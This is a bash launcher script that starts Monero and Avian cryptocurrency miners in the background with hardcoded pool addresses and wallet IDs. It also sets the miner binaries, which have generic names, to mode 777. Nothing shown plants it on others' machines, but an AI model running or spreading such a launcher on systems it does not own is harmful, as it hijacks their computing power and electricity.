chmod 777 cpu
chmod 777 avn
thread=$(grep -c processor /proc/cpuinfo)

ID=Test
xmrWallet=44enxPPXZ8a5R6EenfxUNwSWPNQ76BNv2CPEYF9QF4g62TDHVQTVikgYiTEQHnkLe8AevPmPzM8YD8cRYXpfsworKVW3BSC
xmrPool=pool.supportxmr.com:443
avnWallet=RR5krrLUGTTnySZhEgBHkr3iDo4RyaTYms
avnPool=stratum-na.rplant.xyz:17068

case $1 in
    "XMR")
        if [[ $# -eq 1 ]] ; then
            let thread=thread/2
            ./cpu -o ${xmrPool} -u ${xmrWallet}.${ID} -t $thread -k --tls -B
            exit 1
        fi
        if [[ $2 -ge $thread ]] ; then
            ./cpu -o ${xmrPool} -u ${xmrWallet}.${ID} -t $thread -k --tls -B
            exit 1
        fi
        ./cpu -o ${xmrPool} -u ${xmrWallet}.${ID} -t $2 -k --tls -B
        ;;
    "AVN")
        if [[ $# -eq 1 ]] ; then
            let thread=thread/2
            ./avn --algorithm minotaurx --pool ${avnPool} --wallet ${avnWallet}.${ID} --password webpassword=x --cpu-threads $thread --disable-gpu --background
            exit 1
        fi
        if [[ $2 -ge $thread ]] ; then
            ./avn --algorithm minotaurx --pool ${avnPool} --wallet ${avnWallet}.${ID} --password webpassword=x --cpu-threads $thread --disable-gpu --background
            exit 1
        fi
        ./avn --algorithm minotaurx --pool ${avnPool} --wallet ${avnWallet}.${ID} --password webpassword=x --cpu-threads $2 --disable-gpu --background
        ;;
    *)
        let thread=thread/2
        ./cpu -o ${xmrPool} -u ${xmrWallet}.${ID} -t $thread -k --tls -B
        ;;
esac
